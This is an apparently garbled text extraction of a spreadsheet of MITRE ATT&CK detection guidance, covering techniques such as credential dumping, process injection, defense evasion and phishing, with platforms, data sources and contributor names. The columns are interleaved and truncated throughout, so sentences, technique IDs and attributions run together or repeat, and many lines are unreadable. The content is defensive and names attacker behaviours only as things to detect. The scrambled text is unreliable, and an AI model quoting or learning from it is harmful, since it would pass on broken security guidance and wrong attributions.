Micro; Ariel Shuper, such as anomalous
Cisco; Brad Geesa
Analyze netLinux, Win Network Tra FALSE
Monitor processes and
Linux, Net command-line
Command: arguments for actions thatAustin
C FALSE could Clark,
be taken to gather system and network information. R
@c2defense
Consider enabling file/directory
Linux, Win Active Direpermission
FALSE change auditing on folders containing
File systemCrowdStrike keyOverWatch;
Falcon binary/configuration
Jan Miller,files. For example,
CrowdStrike
Consider enabling file/directory permission
Linux, macCommand: C change auditing on folders containing key binary/configuration files.
1 T1222
Consider enabling
Windows file/directory
Active Direpermission 1 T1222
change auditing on folders containing key binary/configuration files. For example,
Linux, Off Application FALSE Blake Strom, Microsoft Threat Intelligence
System fir Linux, Net Firmware: FALSE
Monitor creation
Windowsand File:
modification
File ofFALSE
.LNK, .SCF, or any other filesSudhanshu
on systemsChauhan,
and within
@Sudhanshu_C;
virtual environments
Teodor that
Cimpoesu
contain res
Monitor forIaaS, IdentLogon Sess FALSE Dylan Silva, AWS Security
Consider modifying
IaaS, IdentLogon
SAML responses
Sess to include
1 T1606 custom elementsBlake for each
Strom,
service
Microsoft
provider.
365Monitor
Defender;these
Jackcustom
Burns,elements
HubSpot;inO
Monitor forIaaS, Linu Logon Sess 1 T1606 Jack Burns, HubSpot
Much of this
PREactivity may
Internet
haveSa veryFALSE
high occurrence and associated Sam Seabrook,
false positive
Dukerate,
Energy
as well as potentially taking place out
PRE
Much of this Internet
activity may haveSa very high1occurrence
T1592 and associated false positive rate, as well as potentially taking place out
PRE may be focused on related
Detection efforts 1 T1592
stages of the adversary lifecycle, such as during Initial Access.
PRE
Much of this Internet
activity may haveSa very high1occurrence
T1592 and associated false positive rate, as well as potentially taking place out
PRE
Much of this Internet
activity may haveSa very high1occurrence
T1592 and associated false positive rate, as well as potentially taking place out
PRE mayNetwork
Detection efforts be focused Traon FALSE
related stages of the adversary Jannie Li, Microsoft
lifecycle, such asThreat
duringIntelligence Center (MSTIC); Obsid
Initial Access.
PRE may be focused on related
Detection efforts 1 T1589
stages of the adversary Lee lifecycle,
Christensen,
suchSpecterOps; Massimo
as during Initial Giaimo, Würth Group
Access.
PRE mayNetwork
Detection efforts be focused Traon related1 T1589
stages of the adversary Jannie Li, Microsoft
lifecycle, such asThreat
duringIntelligence Center (MSTIC)
Initial Access.
PRE may be focused on related
Detection efforts 1 T1589
stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on FALSE related stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related stages of the adversary
1 T1590 lifecycle,
Jannie such asThreat
Li, Microsoft duringIntelligence
Initial Access.
Center (MSTIC)
Detection efforts
PRE may be focused on related stages of the adversary
1 T1590 lifecycle,
Jannie such asThreat
Li, Microsoft duringIntelligence
Initial Access.
Center (MSTIC)
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1590
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1590
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1590
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1590
Detection efforts
PRE may be focused on FALSE related stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related 1 T1591
stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related 1 T1591
stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related 1 T1591
stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related 1 T1591
stages of the adversary lifecycle, such as during Initial Access.
Monitor forWindows
abnormalActive
LDAP queries
Dire with
FALSE filters for <code>groupPolicyContainer</code>
Jonhnathan Ribeiro, 3CORESec, and high@_w0rk3r;
volumes ofTed LDAP
Samuels,
traffic to
Rapd
Endpoint sensors
Linux, Win
mayApplication
be able to detect FALSE
the addition of hardware via USB, Thunderbolt, and other external device communica
Monitor filLinux, Off Application FALSE
On Windows Linux, Off Applicatio
systems, monitor for creation 1 T1564
of suspicious inbox rulesDor through
Edry, Microsoft;
the use ofLiran
theRavich, CardinalOps
<code>New-InboxRule</code> an
Defense Evasion Linux, Win File: File C 1 T1564
Detecting tLinux, Win File: File 1 T1564 Administrator, User
Monitor theLinux, Win Command: Co 1 T1564 Host forensic analysisUser
Linux, Win
In macOS, monitor forCommand:
commands, C processes,
1 T1564 Omkar Gudhate
and file activity in combination with a user that has a userID under 500.(Citation
Monitor proLinux, Win Command: Co 1 T1564 Mark Tsipershtein; Travis Smith, Tripwire
Defense Evasion Linux, Win Command: C 1 T1564 Viren Chaudhari, Qualys
The Streams tool of Sysinternals
Windows Command: Co can be used to
1 T1564 uncover files with ADSs. The
Anti-virus, Oddvar Moe,<code>dir /r</code>
@oddvarmoe; command
RedNTFS can also
partitioned bedrive
hard used
Analyze process
Windowsbehavior to determine
Process: Pr if 1a T1564
process is performing actions it usuallyUser does not and/or do no align with its logged
Monitor command-line
macOS activity leveraging
Command: Co 1the use of resource
T1564 Gatekeeperforks,
Ivanespecially
Sinyakov;those
Jaron immediately followed by potentially mali
Bradley @jbradley89
Benign usage of virtualization
Linux, Win Command: technology
C 1isT1564
common in enterprise environments,
Janantha MUser data and events should not be viewed in iso
If the document is opened with
Linux, Win File: File a Graphical User
1 T1564 Interface (GUI) the malicious
Rick Cole, User p-code is decompiled MSand may
Office be viewed.
version Howe
specified in
Command and ControLinux, Net Domain Nam FALSE Diyar Saadi Ali; Eliav Livneh; Hen Porcilan; Matt Mullins
Tools such Linux,
as Sysinternals Autoruns
Win Command: C may
FALSEalso be used Anti-virus,
to detect system changes
Application that could be attempts at persistence, includin
Control
Defense Evasion, PersiWindows File: File 1 T1574 Ivy Drexel; Thomas B
For detect Windows Command: C 1 T1574 Jesse BrowAdministrator, User
Monitor filWindows File: File 1 T1574 Ami Holeston, CrowdStrike; Marina Liang; Stefan Kanthak; Tra
Monitor proWindows File: File 1 T1574 Anti-virus, Application Control
Run path dependent
macOS libraries
File: File can include 1<code>LC_LOAD_DYLIB</code>,
T1574 Application Control <code>LC_LOAD_WEAK_DYLIB</code>, and <code>
Monitor processes
Linux, macCommand:
for unusual activity
Co (e.g.,1 T1574
a process that does not use theUser network begins to do so). Track library metadata,
Look for abnormal
WindowsprocessFile: File
call trees from1typical
T1574processes and services
Stefan Kant
andAfor
dministrator,
execution User
of other commands that could rela
MonitoringWindows
Windows Process:
API calls Oindicative of1 T1574
the various types of code injection may generate a significant amount of data and
Data
Data and Linux, should
and events
events Win File:
should File
not
not be
be viewed
viewed in 1 T1574 but
in isolation,
isolation, butApplication
as
as part of Stefan
part of chainKanthak
aa chain of
of behavior
behavior that
that could
could lead
lead to
to other
other activities,
activities, such
such as
as
Windows File: File 1 T1574 Stefan KanAdministrator, SYSTEM, User
Windows
Data and events should File: File
not 1 T1574 but as part of Stefan
be viewed in isolation, a chainKanthak
of behavior that could lead to other activities, such as
Windowsprocess
Look for abnormal File: File
call trees from1typical
T1574processes and services
Stefan Kant
andAfor
dministrator,
execution User
of other commands that could rela
Windowsand
Monitor processes Command:
command-lineC 1 T1574 for actions
arguments Application
thatMatthew
could beDe Administrator,
done to modify User
services. Remote access tools with
Containers,Cvariables
Monitor environment loud Serviand APIs
FALSE Anti-virus,toJamie
that can be leveraged disableWilliams (Umeasures.
security ω U), PANW Unit 42; Liran Ravich, Cardinal
Monitor theWindows
addition ofApplicatio
the MiniNT registry 1 T1562 Log analysiLucas Heiligenstein; Prasanth Sadanala, Cigna Information
key in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control`, which may Pro
d
Monitor cloIaaS Firewall: F 1 T1562 Arun Seelagan, CISA; Expel
Monitor logIaaS, IdentCloud Servi 1 T1562 Alex Soler, AttackIQ; Arun Seelagan, CISA; Ibrahim Ali Khan;
Defense Evasion Linux Command: Co 1 T1562 Tim (Wadhwa-)Brown
Monitor proLinux, Net Command: C 1 T1562 Firewall
Lack of expected log events may be
ContainersCommand: C suspicious.
1 T1562 Anti-virus, Alex Soler, AttackIQ; Cian Heasley; Daniel Feichter, @VirtualA
Monitor network dataCommand:
Linux, Win to detect cases
C where HTTP is used instead
1 T1562 of HTTPS.
Arad Inbar, Fidelis Security; Daniel Feichter, @VirtualAllocEx,
Monitor forLinux,
modification of PowerShell
Net Command: C command
1 T1562 historyHostsettings through
forensAustin processes
Clark, being created
@c2defense; with <code>-HistorySaveSt
Emile Kenning, Sophos; Vikas Singh
DependingLinux,
on theWintypes of host information
Command: C collected,Anti-virus,
1 T1562 an analystLucas
may be able to detect
Heiligenstein; Robthe event that triggered a process to s
Smith
Monitor execution
Windowsof Command:
processes and C commands
1 T1562associated with making
Anti-virus, Jorell Magconfiguration
Administratorchanges to boot settings, such as <code
Defense Evasion Linux, Win Process: Pr 1 T1562 Menachem Goldstein
Defense Evasion Linux, Off Application FALSE Blake Strom, Microsoft Threat Intelligence; Pawel Partyka, Mi
In containerized
Containers,
environments,
Image: Imachanges FALSEmay be detectable by monitoring
PraetorianUser
the Docker daemon logs or setting up and monitorin
File systemContainersApplication FALSE Anti-virus, Blake Strom, Microsoft 365 Defender; Brad Geesaman, @brad
Monitor forLinux,
suspicious
Net Command:
modificationsCo or deletion
1 T1070of <code>ConsoleHost_history.txt</code>
Host forensAustin Clark, @c2defense; Emile and useKenning,
of the <code>Clear-Histor
Sophos; Vikas Singh
File systemLinux, macCommand: Co 1 T1070
Defense Evasion Linux, Off Application 1 T1070 Liran Ravich, CardinalOps
Defense Evasion Linux, Net Command: Co 1 T1070 CrowdStrike Falcon OverWatch
Defense Evasion Linux, Win Command: C 1 T1070 Gavin Knapp
Deleting WiWindows Command: C 1 T1070 Anti Virus, Lucas Heiligenstein
It may be uLinux, Win Command: C 1 T1070 Host forensWalker Johnson
Network shWindows Command: C 1 T1070 Host forensic analysis Established network share co
Defense Evasion Linux, Net File: File M 1 T1070 Matt Anderson, @‌nosecurething, Huntress
Forensic teLinux, Win Command: Co 1 T1070 Host forensMike Hartley @mikehartley10; Romain Dumont, ESET
Monitor anWindows Command: C FALSE ApplicationLiran Ravich, CardinalOps; Matthew Demaske, Adaptforward
Analyze network dataCommand:
Linux, Net for uncommon data flows (e.g., a client sending
Co FALSE significantly more
Alain Homewood; Jeremydata than itJoe
Hedges; receives from Page
Wise; John a server).
(aka hP
For network infrastructure devices,
ContainersCloud Stor collect
FALSE AAA logging to monitor for èrase`,
Austin `format`, andHarjot
Clark, @c2defense; `reload`
Shahcommands
Singh being run in s
Detection mLinux, Net Driver: Dri FALSE John Lambert, Microsoft Threat Intelligence Center
Verify integrity of live processes
Windows Process: O by comparing
1 T1056code in memory to that of corresponding static binaries, specifically checking fo
Inspect andLinux,
scrutinize input prompts
Win Command: C for indicators
1 T1056 of illegitimacy,Matthew
such as non-traditional
Molyett, @s1air, banners, text, timing, and/or source
Cisco Talos
KeyloggersLinux, Net Driver: Dri 1 T1056 TruKno
File monitoLinux, Win File: File M 1 T1056 An externally facing login por
Monitor forLinux, Win Module: Mod FALSE TRUE
Monitor forWindows
spawningModule:
of processes
Mod associated
1 T1559
with COM objects, especially those invoked by TRUE
a user different than the one cur
OLE, OfficeWindows
Open XML,Module:
CSV, and Modother files1 can
T1559
be scanned for ‘DDEAUTO', ‘DDE’, and otherTRUE strings indicative of DDE execution
macOS Process: Pr 1 T1559 Csaba Fitzl @theevilbi FALSE
Network intLinux, Off Application FALSE Swetha Prabakaran, Microsoft Threat Intelligence Center (MS
Monitor forLinux, Win Command: C FALSE Shailesh Tiwary (Indian Army)
IaaS, Linu Command: C FALSE Bilal Bahadır Yenici; Menachem Goldstein
ContainersCommand:
Look for indications Co FALSE that may indicate
of common characters Application Bartosz Jerzman;
an attempt David
to trick users Lu,misidentifying
into Tripwire; Elastic;
theFelipe Espósito,
file type, such as@
Defense Evasion Linux, macProcess: OS 1 T1036 Tim (Wadhwa-)Brown
Monitor forWindows File: File C 1 T1036
Collect andWindows, File: File 1 T1036
Defense Evasion Containers,User Accou 1 T1036 Menachem Goldstein
Defense Evasion Linux, Win Command: C 1 T1036 Ben Smith, @ezaspy; CrowdStrike Falcon OverWatch
Look for chLinux, Win Command: C 1 T1036
ContainersFile:
In containerized File use image1IDs
environments, T1036
and layerApplication
hashes toVishwas
compare Manral,
imagesMcAfee;
instead Yossi Weizman,
of relying Azure
only on theirDefender Re
names.(Cita
If file nam Linux, Win Command: C 1 T1036
Detection Linux, Win File: File 1 T1036
It's not coproperty
Monitor Linux, macFile:
changesFilein Group Policy1that
T1036 Erye HernaUser
manage authentication mechanisms (i.e. [Group Policy Modification](https://att
IaaS, IdentActive Dire FALSE Chris Ross @xorrior
Credential Access, DeIaaS, IdentActive Dire 1 T1556 Gavin Knapp; Joshua Penny
Configure robust,
Windows consistent
File: Fileaccount activity audit policies across the enterprise and with externally accessible services.(Citati
1 T1556
Credential Access, DeIaaS, IdentApplication 1 T1556 Praetorian
Credential Access, DeIaaS, IdentActive Dire 1 T1556 Multi-Fact Arun Seelagan, CISA; Liran Ravich, CardinalOps; Muhammad M
Detection of Network
this behavior
File: File
mayMbe difficult,1 T1556
detection efforts may be focusedAdministrator
on closely related adversary behaviors, such as [M
Credential Access, DeWindows File: File 1 T1556 CrowdStrike Falcon OverWatch; Jai Minton
Password filters
Windowswill also
File:show
File up as an autorun
1 T1556and loaded DLL in Vincent
lsass.exe.(Citation:
Le Toux Clymb3r Function Hook Passwords Sept
Look for suspicious
Linux, macFile:
account File
behavior across
1 T1556
systems that share accounts,
George Allen,
eitherVMware
user, admin,
Carbonor Black;
serviceScott
accounts.
Knight,Examples:
@sdotknig o
Monitor Fine-Grained
Windows ActivePasswordDir Policies and
1 T1556
regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)
Establish c IaaS Cloud Serv FALSE
IaaS
In AWS, CloudTrail Instance:
logs captureI the creation
1 T1578
of an instance in theArun Seelagan, CISA
<code>RunInstances</code> event, and in Azure the creatio
IaaS Activity
Google's Admin Snapshot: 1 T1578
audit logs within their Cloud Audit logs canPraetorian
be used to detect the usage of the <code>gcloud compute
IaaS
In AWS, CloudTrail Instance:
logs captureI the deletion
1 T1578
of an instance in theArun Seelagan, CISA
<code>TerminateInstances</code> event, and in Azure the d
Defense Evasion IaaS Cloud Servi 1 T1578 Amir Gharib, Microsoft Threat Intelligence; Blake Strom, Micr
Establish c IaaS Instance: I 1 T1578 Netskope User
Defense Evasion IaaS Cloud Servi FALSE
Monitor forWindows
processes,Command:
command-lineC FALSE
arguments, andHost forens
API calls Bartosz Jerzman;
associated David Lu,Registry
with concealing Tripwire; Travis
keys, Smith,
such Tripwire(Cita
as Reghide.
Many vendors of embedded
Network File: Filenetwork
M devices can provide advanced debugging
FALSE support that will allow them to work with devi
Administrator
Many embedd Network File: File M 1 T1601 Administrator
Many vendors of embedded
Network File: Filenetwork
M devices can provide advanced debugging
1 T1601 support that will allow them to work with devi
Administrator
Similar to [Input
Linux, Capture](https://attack.mitre.org/techniques/T1056),
Win Driver: Dri FALSE keylogging
John Lambert, activity Threat
Microsoft can take various forms
Intelligence Centerbut can may
Monitor use IaaS, IdentApplication FALSE Arun Seelagan, CISA; Jon Sternstein, Stern Security; Obsidian
Host data tLinux, Win Network Tra FALSE
Utilization of the Win
Linux, Windows
Module: APIsMo
may FALSE
involve processes loading/accessing system
Gordon Long, DLLs
Box, Incassociated
FALSE with providing called functio
Monitor the border network
Network Networkdevice’s configuration to Firewall,
Tra FALSE validate that
SystemtheAccess
policy enforcement
Controls sections are what was intended. L
Monitor the Network
border network
Networkdevice’s
Tra configuration
1 T1599 to determine if any unintended Administrator
NAT rules have been added without autho
Detection oContainersNetwork Tra FALSE Vishwas Manral, McAfee; Yossi Weizman,
Detection oIaaS, Linu Network Tra 1 T1498
Detection oIaaS, Linu Network Tra 1 T1498
Normal, benign
ContainersCloud
system and Serv network FALSE
events from legitimate remote Praetorian
service scanning may be uncommon, depending on the en
Normal, benign
Linux,system
Win Command:
and networkC FALSE
events related to legitimatePraetorian
remote system discovery may be uncommon, depending on
In cloud-based
IaaS,environments,
Linu Command: monitor
C FALSEfor the creation of new traffic
Austinmirrors
Clark,or
@c2defense;
modificationElirazNetwork
of existing traffic
interface
mirrors.
access
For net
and
Monitor and Linux,
investigate
Net NetworkAPI calls
Trato functions
FALSE associated with enabling Duaneand/or
Michael;utilizing
Ryan Becwar
alternative communication channels.
Analyze
### LinuxpacLinux, Win Network Tra FALSE
Linux,
To obtain the Win Active
passwords andDire
hashes FALSE
stored in memory, processesEdmust Williams,
open Trustwave,
a maps file inSpiderLabs;
the `/proc`Tim (Wadhwa-)Brown;
filesystem V
for the proce
The AuditDLinux Command: C 1 T1003
Detection ofLinux, Win Command:
compromised 1 T1003 Ed Williams, Trustwave,in-use
[Valid Accounts](https://attack.mitre.org/techniques/T1078) SpiderLabs; Tim (Wadhwa-)Brown;
by adversaries may help as we Yv
Note: DomainWindows Active
controllers mayDire 1 T1003 requests originating
not log replication ExtraHop;
from Vincent Le Toux
the default domain controller account.(Citation: Ha
Monitor pro Windows Command: C 1 T1003 Ed Williams, Trustwave, SpiderLabs
Windowsand
Monitor processes Command:
command-lineCo arguments
1 T1003 for program execution
Ed Williams,
that Trustwave, SpiderLabs;
may be indicative Edward dumping.
of credential Millington;Remot
Mich
Monitor prWindows Command: C 1 T1003 Ed Williams, Trustwave, SpiderL Access to Domain Controller
To obtain tLinux Command: C 1 T1003 Tim (Wadhwa-)Brown
Hash dumpe Windows Command: C 1 T1003 Ed Williams, Trustwave, SpiderLabs; Olaf Hartong, Falcon Forc
The first detection
Linux, Netof aApplication
malicious toolFALSE
may trigger an anti-virus orChristiaan
Application other security
Beek,tool alert. Similar events
@ChristiaanBeek; may also occur at the
Red Canary
DependingLinux,
o Win File: File 1 T1027 Anti-virus, Martin Jirkal, ESET
Defense Evasion Linux, Win Command: C 1 T1027 George Thomas; Tim Peck; TruKno
Monitor the Linux, Win Command: Co 1 T1027 Anti-virus, Liran Ravich, CardinalOps; Praet Compiler software (either na
Defense Evasion Windows File: File 1 T1027
Defense Evasion Linux, Win File: File C 1 T1027 Nick Cairns, @grotezinfosec User
Defense Evasion Linux, Win File: File C 1 T1027 Andrew Northern, @ex_raritas; David Galazin @themalwarem
Defense Evasion Linux, Win Process: P 1 T1027 Christopher Peacock; Denise Tan; Mark Wee; Simona David; V
Consider monitoring
Linux, Winfiles
File:downloaded
File C from
1 T1027
the Internet,
Anti-virus,
possiblyJonathan
by HTMLBoucher,
Smuggling, @crash_wave,
for suspicious Bank
activities.
of Canada;
DataKrishnan
and evenS
The first d Linux, Win Application 1 T1027 Anti-virus, Host intrusion prevention systems, Log analysis, Signature-ba
Windows File: File C 1 T1027 Andrew Northern, @ex_raritas; Gregory Lesnewich, @gregles
Defense Evasion Linux, Win Application 1 T1027 Signature- TruKno; Ye Yint Min Thu Htut, Active Defense Team, DBS Ban
Use file sc Linux, Win File: File 1 T1027 Anti-virus, Filip Kafka, ESET
Detection oLinux, Win File: File 1 T1027
Defense Evasion Linux, Net File: File 1 T1027
Much of thisPRE Certificat
activity will FALSE the visibility of the target organization, making detection of this behavior difficult.
take place outside
Resource DevelopmenPRE 1 T1588
Much of thisPRE Malware
activity will Re outside
take place 1 T1588
the visibility of the target organization, making detection of this behavior difficult.
PRE mayCertificate
Detection efforts be focused on related 1 T1588
behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/0
Much of thisPREactivity will take place outside the visibility of the target organization, making detection of this behavior difficult.
1 T1588
Much of thisPREactivity will take place
Malware Re outside the visibility of the target organization, making detection of this behavior difficult.
1 T1588
Much of thisPREactivity will take place
Malware Re outside the visibility of the target
1 T1588 organization,
Mnemonic making detection of this behavior difficult.
AS; SOCCRATES
Much of thiPRE 1 T1588
Microsoft has released
Office a PowerShell FALSE
Sui Applicatio script to safely gather mail forwarding rulesMicrosoft
Loic Jaquemet; and custom forms
Threat in your mail
Intelligence environment
Center (MSTIC);a
Collect process execution information
Office Sui Command: C including
1 T1137 process IDs (PID) and parent process IDs (PPID) and look for abnormal chains o
Many Office Office Sui Command: C 1 T1137
Consider monitoring
Office Sui Office processes
Command: C for anomalous
1 T1137 DLL loads.
Collect process
Officeexecution
Sui Applicatio
information including
1 T1137 process IDs (PID) and parent process IDs (PPID) and look for abnormal chains o
Collect process
Officeexecution
Sui Applicatio
information including
1 T1137 process IDs (PID) and parent process IDs (PPID) and look for abnormal chains o
Collect process
Officeexecution
Sui Applicatio
information including
1 T1137 process IDs (PID)Microsoft
and parent Security
process IDs (PPID) and look for abnormal chains o
Monitor logIaaS, IdentCommand: C FALSE Austin Clark, @c2defense; Isif Ibrahima, Mandiant; Regina Elw
Monitor processes
Linux, Winand Command:
command-lineC FALSE
arguments for actions that could be taken Administrator,
to gather SYSTEM,
system and User
network information. R
Monitor processes
Containers,
andApplicatio
command-line FALSE
arguments for actions thatDaniel could Prizmant,
be taken to Palogather
Alto system
Networks;
andMicrosoft
network information.
Threat Intellig R
Monitor processes
IaaS, IdentApplicatio
and command-line arguments 1 T1069 for actions thatIsif could
Ibrahima,
be taken Mandiant;
to gatherRegina
system Elwell
and network information. A
Monitor processes
Linux, WinandCommand:
command-line C arguments
1 T1069 for actions thatHarshal
could be Tupsamudre,
taken to gatherQualys;
system
Miriam
andWiesner,
network information.
@miriamxyra,R
Linux, Win
Monitor processes andCommand:
command-line C 1 T1069 for actions thatHarshal
arguments could be Tupsamudre,
taken to gatherQualys; Miriam
system andWiesner, @miriamxyra,R
network information.
Identity
Anti-virus can Pr Application
potentially FALSEdocuments and files that
detect malicious LioraareItkin; Liran Ravich,
downloaded CardinalOps;
on the Ohad Zaidenberg,
user's computer. Many possible@ohad
PRE media Application
Monitor social FALSEactivity, including messages
traffic for suspicious Liora Itkin; Liran Ravich,
requesting CardinalOps;
information Ohad
as well as Zaidenberg,
abnormal file or @oha
data
Monitor forPRE Application 1 T1598 Philip Winther; Robert Simmons, @MalwareUtkonos; Sebasti
Monitor forPREreferences Application
to uncategorized or 1 T1598
known-bad sites. URLAustin Herrin;
inspection Elpidoforos
within Maragkos,
email (including @emaragkos;
expanding Joas Anto
shortened links
PRE mayApplication
Detection efforts be focused on related 1 T1598 Robert
stages of the adversary Simmons,
lifecycle, such@MalwareUtkonos
as during Initial Access.
Reconnaissance PRE Application 1 T1598
Monitor forLinux, Win Application
suspicious descendant process 1 T1566
spawning from Microsoft PhilipOffice
Wintherand other productivity software.(Citation: Elastic -
Because this technique
Identity usually involves user
Pr Application interaction on the endpoint,
1 T1566 manyMicrosoft
Jeff Sakowicz, of the possible detections
Identity Developer take place once
Platform [Us
Services
Initial Access Identity P Application 1 T1566
Anti-virus can potentially
Linux, detect malicious1documents
Win Application T1566 and files that are downloaded on the user's computer. Endpoint sensing
Identify new services
macOS executed
Command: from
C plist
FALSE modified in
Command-line invocation of tools capable of modifying services the previousmayuser's session.and can be monitored for and alerted on, dep
be unusual
Linux, Net Command: C FALSE Juan Tapiador; Menachem Goldstein
Disk check,Linux,
forensic
Netutilities,
Command: and data from device drivers
C FALSE (i.e. processes
Anti-virus, and API calls)
File monitoring, may reveal
Host intrusion anomaliessystems
prevention that warrant dee
Perform inLinux, Win Drive: Driv 1 T1542 Anti-virus, File monit Administrator, SYSTEM
Disk check Linux,
and forensic utilities
Win Driver: Dr may reveal indicators of
1 T1542 maliciousFile
Anti-virus, firmware such as strings, unexpected
monit SYSTEM disk
Ability to partition
update table en
component
There are nNetwork Firmware: 1 T1542 Administrator
Likewise, EFI
Network,
modulesFirmware:
can be collected and 1 T1542
compared Anti-virus,
against a known-clean
Jean-Ian Boutin, list of
ESET;
EFI executable
McAfee; Ryan binaries
Becwarto detect potentiall
Review command
Networkhistory
Command:
in eitherC the console
1 T1542or as part of the running memory Administrator
to determine if unauthorized or suspicious co
For network Linux,
infrastructure
Net Command: devices,C collect
FALSE AAA logging to monitor Austin
for `show`
Clark, commands
@c2defensebeing run by non-standard users from
Analyze process
Linux,behavior
Win File: toFiledetermine
FALSE
if a process is performing
Anti-virus, Anastasios
actions it usually
Pingios;does
Christiaan
not, such
Beek,
as opening
@ChristiaanBeek;
network connecti
Ryan B
Analyze process
Windowsbehavior
Process:
to determine
OS if 1a T1055
process is performing
Anti-virus, Application
actions it usually
controldoes not, such as opening network connecti
Windows
Analyze process Module:
behavior Mod
to determine if 1a T1055 Anti-virus, BoominathUser
process is performing actions it usually does not, such as opening network connecti
Monitor foWindows Process: O 1 T1055 Anti-virus, Application control
Windows
Analyze process Process:
behavior OS
to determine if 1a T1055
process is performingESET User such as opening network connections, readi
unusual actions,
Windows
Analyze process Process:
behavior OS
to determine if 1a T1055 Anti-virus, Applicatio
process is performing User does not, such as opening network connecti
actions it usually
Linux behavior
Analyze process File: to
Filedetermine
M if 1a T1055 Anti-virus, Application
process is performing controldoes not, such as opening network connecti
actions it usually
Windows
Analyze process File: to
behavior Filedetermine if 1a T1055 Anti-virus, Applicatio
process is performing Administrator,
actions it usually does not, SYSTEM,
such asUser
opening network connecti
Windows
Analyze process Process:
behavior OS
to determine if 1a T1055 Anti-virus, Applicatio
process is performing User does not, such as opening network connecti
actions it usually
Analyze process
Linux behavior to determine
Process: OS if 1a T1055
process is performing actions it usually
Anti-virus, Application controldoes not, such as opening network connecti
Analyze process behavior
Windows Process: OSto determine if a process
1 T1055 is performing
Anti-virus, Applicatio User does not, such as opening network connecti
actions it usually
Analyze process
Windowsbehavior to determine
Process: OS if 1a T1055
process is performing actions it usually
Anti-virus, Application controldoes not, such as opening network connecti
Analyze process
Linux behavior to determine
Module: Mo if 1a T1055
process is performing actions it usually
Anti-virus, Application controldoes not, such as opening network connecti
Analyze network dataNetwork
Linux, Win for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). P
Tra FALSE
Consider monitoring for traffic to
Linux, Net Network Tra FALSE known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).
Heather Linn; Jon Sheedy; Walker Johnson
If SSL insp Linux, Win Network Tra 1 T1090 Matt Kelly, @breakersall
Analyze netLinux, Net Network Tra 1 T1090
Analyze netLinux, Net Network Tra 1 T1090
In context of
Linux,
network
Net Network
devices, Tramonitor traffic
1 T1090
for encrypted communications
Eduardo Chavarro from theOvalle
Internet that is addressed to border rou
InteractionWindows
with the Windows
Command: Registry
C FALSE
may come from the command line using utilities such as [Reg](https://attack.mitre.org/
Analyze process
Linux,behavior
Win Module:to determine
Mod FALSEif a process is performing
Anti-virus, Jiraput
actionsThamsongkrah;
it usually does not,Joas such
Antonio
as opening
dos Santos,
network
@C0d3Cr4zy
connecti
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004)
Linux, Win Network Tra FALSE Dray mayAgha,
be used
@Purp1eW0lf,
in conjunctionHuntress
to avoid
Labs;
defenses.
Matt Kelly,
Adversaries
@break
Monitor forLinux,
processes
Win Command:
and command-line
C FALSEarguments associated with hijacking service sessions.
Use of RDPWindows
may be legitimate,
Command: depending
C 1on
T1563
the network environment and how it is used. Other factors, such as access patter
Use of SSHLinux, macCommand: C 1 T1563 Anastasios root SSH service enabled, trust re
IaaS,can
In macOS, you Linu Command:
review logs forC"screensharingd"
FALSE Dan Borges,
and "Authentication" event@1njection
messages. Monitor Active remote
network service accepti
connections rega
Lateral Movement IaaS, IdentLogon Sess 1 T1021
Lateral Movement IaaS Logon Sess 1 T1021 Thanabodi Phrakhun, @naikordian
Monitor forWindows Module:
any influxes Mo increases
or abnormal 1 T1021in DCOM related Distributed Computing Environment/Remote Procedure Call (
Use of RDPWindows Logon Sessi 1 T1021 Matthew Demaske, AdaptforwarRDP service enabled, accoun
Ensure thatWindows Command: C 1 T1021 SMB enabled; Host/network
Linux, macLogon
On Linux systems SSH activitySessi
can be found 1 T1021
in the logs located in <code>/var/log/auth.log</code>An orSSH server is configured a
<code>/var/log/secure</
Monitor forLinux,
use ofWin Logondebugging
built-in Sessi 1 T1021 variables (such as those containing credentialsVNC
environment server
or other installedinformatio
sensitive and liste
Monitor useWindows Command: C 1 T1021
Monitor forLinux,
processes that can beC used
Net Command: to discover remote systems,
FALSE such
Austin as <code>ping.exe</code>
Clark, and <code>tracert.exe</
@c2defense; Daniel Stepanic, Elastic; RedHuntLa
Monitor filWindows Drive: Driv FALSE Joas Antonio dos Santos, @C0d3Removable media allowed, A
Consider mContainersApplication FALSE Alfredo Oliveira, Trend Micro; David Fis
ContainersCommand: Co 1 T1496
SaaS Application 1 T1496
ContainersCommand: Co 1 T1496
SaaS Application 1 T1496
InvestigateWindows
usage of Kerberos
Active DireServiceFALSE
Principal NamesLog(SPNs),
analysiVincent
especially those
Le Administrator
associated with services (beginning with “GC/”)
Some rootkiLinux, Win Drive: Driv FALSE Anti-virus, Application Control, File Monitoring, Host Intrusion Preventio
Suspicious ContainersCommand:
program execution through Co FALSE
scheduled tasks may showAlain up asHome
outlier
Administra
processes thatTRUE
have not been seen before whe
Suspicious Linux,
program Winexecution
Command: through
Co scheduled
1 T1053 tasks may show up as outlier Administra
processes thatTRUE
have not been seen before whe
Monitor forContainersContainer: 1 T1053 Center for User TRUE
Suspicious Linux,
program macCommand:
execution through
C scheduled
1 T1053 tasks may show up as outlier Userprocesses thatFALSE
have not been seen before whe
Windows
Remote access Command:
tools with built-inCo
features1may
T1053 Andrew
interact directly with Nor Administra
the Windows TRUE these functions outside of ty
API to perform
Linux
Audit the execution Command:
and C
